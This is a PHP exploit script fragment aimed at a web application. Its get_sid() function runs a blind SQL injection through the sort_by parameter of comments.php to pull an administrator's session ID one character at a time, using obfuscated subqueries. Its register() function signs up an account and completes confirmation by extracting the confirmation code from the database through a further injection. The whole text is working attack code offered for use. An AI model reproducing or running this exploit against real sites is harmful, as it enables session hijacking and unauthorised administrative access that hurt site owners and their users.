function get_sid() { global $host, $path, $prefix, $default_record; $chars = array_merge(array(0), range(48, 57), range(97, 102)); // 0-9 a-z $index = 1; $sid = ""; $packet = "GET {$path}comments.php?sort_by=%s HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cookie: pwg_id=" . md5("foo") . "\r\n"; $packet .= "Connection: close\r\n\r\n"; print "\n[-] Fetching admin SID: "; while (!strpos($sid, chr(0))) { for ($i = 0, $n = count($chars); $i <= $n; $i++) { if ($i == $n) { die("\n\n[-] Exploit failed...try later!\n"); } $sql = "(SELECT/**/IF(ASCII(SUBSTR(id,{$index},1))={$chars[$i]},author,id)/**/FROM/**/{$prefix}sessions" . "/**/WHERE/**/data/**/LIKE/**/" . encodeSQL("pwg_uid|i:1;") . "/**/LIMIT/**/1)/**/LIMIT/**/1/*"; preg_match(PATTERN, http_send($host, sprintf($packet, $sql)), $match); if ($match[1] != $default_record) { $sid .= chr($chars[$i]); print chr($chars[$i]); break; } } $index++; } print "\n"; return $sid; }
function register() { global $host, $path, $username, $password; print "\n[-] Registering new user '{$username}' with password '{$password}'\n"; // register a new account $data = "user_name={$username}"; $data .= "&password={$password}"; $data .= "&confirm_password={$password}"; $data .= "&email_address=" . md5(time()) . "@null.com"; $data .= "&form_submitted=yes"; $data .= "&terms=yes"; $packet = "POST {$path}register.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: " . strlen($data) . "\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Connection: close\r\n\r\n"; $packet .= $data; http_send($host, $packet); $code = retrive_data("random_code", "member_profile", "user_name=" . encodeSQL($username)); if (!isset($code)) { die("\n[-] Registration failed...\n"); } // and confirm the registration $packet = "GET {$path}confirm.php?id={$code} HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Connection: close\r\n\r\n"; if (!preg_match("/registration is now complete/i", http_send($host, $packet))) { die("\n[-] Registration failed...\n"); } }